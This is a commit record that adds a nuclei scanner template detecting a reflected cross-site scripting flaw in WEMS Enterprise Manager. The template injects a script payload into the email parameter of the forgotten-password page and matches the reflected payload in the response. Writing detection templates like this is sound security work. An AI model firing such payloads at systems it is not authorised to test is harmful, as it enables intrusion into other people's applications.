Merge pull request #369 from projectdiscovery/wems-manager-xss

Create wems-manager-xss.yaml
patch-1
bauthard 2020-08-30 11:11:18 +05:30 committed by GitHub
commit 6abc3c9429
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions

View File

@ -0,0 +1,24 @@
id: wems-manager-xss
info:
name: WEMS Enterprise Manager XSS
author: pikpikcu
severity: medium
# Source
# https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html
# https://github.com/pikpikcu/nuclei-templates/blob/master/vulnerabilities/wems-enterprise-xss.yaml
requests:
- method: GET
path:
- '{{BaseURL}}/guest/users/forgotten?email="><script>confirm(document.domain)</script>'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '"><script>confirm(document.domain)</script>'
part: body